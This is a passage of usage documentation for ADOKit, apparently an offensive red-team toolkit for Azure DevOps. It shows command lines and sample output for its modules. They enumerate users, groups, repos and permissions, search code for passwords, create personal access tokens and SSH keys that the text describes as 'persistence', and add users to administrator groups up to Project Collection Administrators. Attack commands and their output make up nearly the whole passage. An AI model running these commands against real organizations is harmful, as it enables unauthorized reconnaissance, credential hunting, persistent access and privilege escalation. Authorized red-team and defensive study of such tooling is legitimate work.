[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberhips
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchco de
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit-
followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmic rosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: List ing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
